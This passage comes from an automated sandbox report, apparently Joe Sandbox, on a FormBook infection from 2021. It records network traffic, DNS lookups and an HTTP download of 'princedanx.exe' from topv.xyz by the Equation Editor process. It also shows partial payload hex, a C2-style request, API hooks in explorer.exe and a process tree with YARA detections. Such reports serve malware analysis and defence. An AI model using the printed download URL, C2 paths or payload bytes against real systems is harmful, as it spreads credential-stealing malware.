Jul 22, 2021 14:21:11.429938078 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.430401087 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.483197927 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484690905 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484726906 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484750032 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484772921 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484831095 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484857082 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484879971 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484896898 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.484901905 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484920979 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.484925032 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.484926939 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484935999 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.484951019 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.484960079 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.484987020 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.494168997 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.537642002 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.537678957 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.537703991 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.537728071 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.537750959 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.537781954 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.537815094 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538445950 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538471937 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538496971 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538518906 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538542032 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538544893 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538564920 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538564920 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538568974 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538582087 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538589954 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538594007 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538613081 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538624048 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538635015 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538654089 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538661003 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538675070 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538677931 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538690090 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538698912 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538714886 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538719893 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538729906 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538742065 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538760900 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.538762093 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538779974 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.538795948 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.539334059 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.591762066 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.591788054 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.591799021 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.591866016 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.591919899 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.591924906 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.591952085 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.591974020 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.591995955 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.591998100 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592021942 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592046976 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592071056 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592071056 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592091084 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592091084 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592108011 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592109919 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592112064 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592129946 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592149019 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592152119 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592154026 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592175007 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592178106 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592197895 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592200041 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592207909 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592549086 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592636108 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.592643976 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592673063 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592691898 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592710018 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592725992 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592741013 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592756033 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592777014 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592793941 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592809916 CEST	80	49167	185.239.243.112	192.168.2.22
Jul 22, 2021 14:21:11.592822075 CEST	80	49167	185.239.243.112	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 14:21:11.245568991 CEST	52197	53	192.168.2.22	8.8.8.8
Jul 22, 2021 14:21:11.302978992 CEST	53	52197	8.8.8.8	192.168.2.22
Jul 22, 2021 14:21:11.303292036 CEST	52197	53	192.168.2.22	8.8.8.8
Jul 22, 2021 14:21:11.362587929 CEST	53	52197	8.8.8.8	192.168.2.22
Jul 22, 2021 14:22:54.660180092 CEST	53099	53	192.168.2.22	8.8.8.8
Jul 22, 2021 14:22:55.085325003 CEST	53	53099	8.8.8.8	192.168.2.22
Jul 22, 2021 14:23:15.754040956 CEST	52838	53	192.168.2.22	8.8.8.8
Jul 22, 2021 14:23:15.843138933 CEST	53	52838	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 22, 2021 14:21:11.245568991 CEST	192.168.2.22	8.8.8.8	0xd9fb	Standard query (0)	topv.xyz	A (IP address)	IN (0x0001)
Jul 22, 2021 14:21:11.303292036 CEST	192.168.2.22	8.8.8.8	0xd9fb	Standard query (0)	topv.xyz	A (IP address)	IN (0x0001)
Jul 22, 2021 14:22:54.660180092 CEST	192.168.2.22	8.8.8.8	0x2e78	Standard query (0)	www.anandsharmah.com	A (IP address)	IN (0x0001)
Jul 22, 2021 14:23:15.754040956 CEST	192.168.2.22	8.8.8.8	0x2f03	Standard query (0)	www.klimareporter.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jul 22, 2021 14:21:11.302978992 CEST	8.8.8.8	192.168.2.22	0xd9fb	No error (0)	topv.xyz	185.239.243.112	A (IP address)	IN (0x0001)
Jul 22, 2021 14:21:11.362587929 CEST	8.8.8.8	192.168.2.22	0xd9fb	No error (0)	topv.xyz	185.239.243.112	A (IP address)	IN (0x0001)
Jul 22, 2021 14:22:55.085325003 CEST	8.8.8.8	192.168.2.22	0x2e78	No error (0)	www.anandsharmah.com	45.64.105.11	A (IP address)	IN (0x0001)
Jul 22, 2021 14:23:15.843138933 CEST	8.8.8.8	192.168.2.22	0x2f03	No error (0)	www.klimareporter.com	81.88.63.46	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

topv.xyz

www.anandsharmah.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	185.239.243.112	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:21:11.430401087 CEST	0	OUT	GET /princedanx.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: topv.xyz Connection: Keep-Alive
Jul 22, 2021 14:21:11.484690905 CEST	2	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Jul 2021 12:21:11 GMT Content-Type: application/x-msdownload Content-Length: 648912 Last-Modified: Wed, 21 Jul 2021 23:31:35 GMT Connection: keep-alive ETag: "60f8ae57-9e6d0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0f 9e f8 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 08 00 00 2c 01 00 00 00 00 00 96 bb 08 00 00 20 00 00 00 c0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c bb 08 00 57 00 00 00 00 c0 08 00 18 28 01 00 00 00 00 00 00 00 00 00 00 ca 09 00 d0 1c 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 9b 08 00 00 20 00 00 00 9c 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 28 01 00 00 c0 08 00 00 2a 01 00 00 9e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 bb 08 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 9f 08 00 a0 1b 00 00 03 00 00 00 20 00 00 06 98 31 00 00 04 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 18 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1a 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 25 00 00 00 00 00 00 00 02 28 15 00 00 0a 02 03 16 2c 0b 26 26 02 04 15 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b f0 7d 03 00 00 04 2b 00 2a 00 00 00 03 30 04 00 5c 00 00 00 00 00 00 00 02 28 15 00 00 0a 20 f0 55 00 00 1c 2d 1b 26 02 73 16 00 00 0a 1d 2d 18 26 26 28 17 00 00 0a 7e 06 00 00 04 25 2d 2f 2b 0e 28 18 00 00 0a 2b df 7d 04 00 00 04 2b e3 26 7e 05 00 00 04 fe 06 0d 00 00 06 73 19 00 00 0a 25 1c 2d 03 26 2b 07 80 06 00 00 04 2b 00 6f 1a 00 00 0a 2a 13 30 03 00 29 00 00 00 01 00 00 11 03 04 73 04 00 00 06 16 2c 0c 26 02 03 28 0a 00 00 06 2d 13 2b 03 0a 2b f2 02 7b 04 00 00 04 06 6f 1b 00 00 0a 17 2a 16 2a 00 00 00 13 30 03 00 24 00 00 00 01 00 00 11 02 03 28 0a 00 00 06 17 2d 06 26 06 2c 14 2b 03 0a 2b f8 02 7b 04 00 00 04 06 6f 1c 00 00 0a 26 17 2a 16 2a 03 30 0a 00 1f 00 00 00 00 00 00 00 02 19 19 2d 13 26 7b 04 00 00 04 03 18 15 2d 0b 26 6f 1d 00 00 0a 2b 06 26 2b eb 26 2b f3 2a 00 03 30 0a 00 19 00 00 00 00 00 00 00 02 19 15 2d 10 26 7b 04 00 00 04 6f 1e 00 00 0a 16 fe 01 2b 03 26 2b ee 2a 00 00 00 13 30 04 00 34 00 00 00 02 00 00 11 73 0e 00 00 06 16 2c 21 26 06 03 19 2d 1e 26 26 02 7b 04 00 00 04 06 fe 06 0f 00 00 06 73 1f 00 00 0a 6f 20 00 00 0a 2b 0a 0a 2b dd 7d 07 00 00 04 2b dd 2a 03 30 09 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`, @ @<W( H.text `.rsrc(@@.reloc@BxH 1n0-&(+&+0s(t-&++~0%(,&&-&&+}+}+0\( U-&s-&&(~%-/+(+}+&~s%-&++o0)s,&(-++{o0$(-&,++{o&0-&{-&o+&+&+0-&{o+&+04s,!&-&&{so ++}+*0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	45.64.105.11	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:22:55.360397100 CEST	685	OUT	GET /np0c/?TR-l=MbGP/ikgWFw1YX8sov0FXcLkJ99H+22h01XVjNUGdiGHtzvfzcfuzIRPwJA9CGENa/tXtg==&CFQLn=EPt44Fr8fZGdt HTTP/1.1 Host: www.anandsharmah.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:22:55.611715078 CEST	685	IN	HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 583 Date: Thu, 22 Jul 2021 12:22:48 GMT Server: LiteSpeed Vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 70 30 63 2f 3f 54 52 2d 6c 3d 4d 62 47 50 2f 69 6b 67 57 46 77 31 59 58 38 73 6f 76 30 46 58 63 4c 6b 4a 39 39 48 2b 32 32 68 30 31 58 56 6a 4e 55 47 64 69 47 48 74 7a 76 66 7a 63 66 75 7a 49 52 50 77 4a 41 39 43 47 45 4e 61 2f 74 58 74 67 3d 3d 26 61 6d 70 3b 43 46 51 4c 6e 3d 45 50 74 34 34 46 72 38 66 5a 47 64 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 61 6e 61 6e 64 73 68 61 72 6d 61 68 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /np0c/?TR-l=MbGP/ikgWFw1YX8sov0FXcLkJ99H+22h01XVjNUGdiGHtzvfzcfuzIRPwJA9CGENa/tXtg==&CFQLn=EPt44Fr8fZGdt was not found on this server.<HR><I>www.anandsharmah.com</I></BODY></HTML>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE5
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE5
GetMessageW	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE5
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE5

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2848 Parent PID: 584

General

Start time:	14:20:35
Start date:	22/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f650000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2376 Parent PID: 584

General

Start time:	14:20:37
Start date:	22/07/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: princedan85671.exe PID: 2240 Parent PID: 2376

General

Start time:	14:20:38
Start date:	22/07/2021
Path:	C:\Users\user\AppData\Roaming\princedan85671.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\princedan85671.exe
Imagebase:	0x8a0000
File size:	648912 bytes
MD5 hash:	0E715DB2198FF670F4BF0E88E0E9B547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 24%, ReversingLabs
Reputation:	low

Analysis Process: princedan85671.exe PID: 532 Parent PID: 2240

General

Start time:	14:21:24
Start date:	22/07/2021
Path:	C:\Users\user\AppData\Local\Temp\princedan85671.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui
Imagebase:	0x150000
File size:	648912 bytes
MD5 hash:	0E715DB2198FF670F4BF0E88E0E9B547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 24%, ReversingLabs
Reputation:	low

Analysis Process: explorer.exe PID: 1388 Parent PID: 532

General

Start time:	14:21:25
Start date:	22/07/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: netsh.exe PID: 2288 Parent PID: 1388

General

Start time:	14:21:41
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\netsh.exe
Imagebase:	0x1300000
File size:	96256 bytes
MD5 hash:	784A50A6A09C25F011C3143DDD68E729
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 2276 Parent PID: 2288

General

Start time:	14:21:45
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
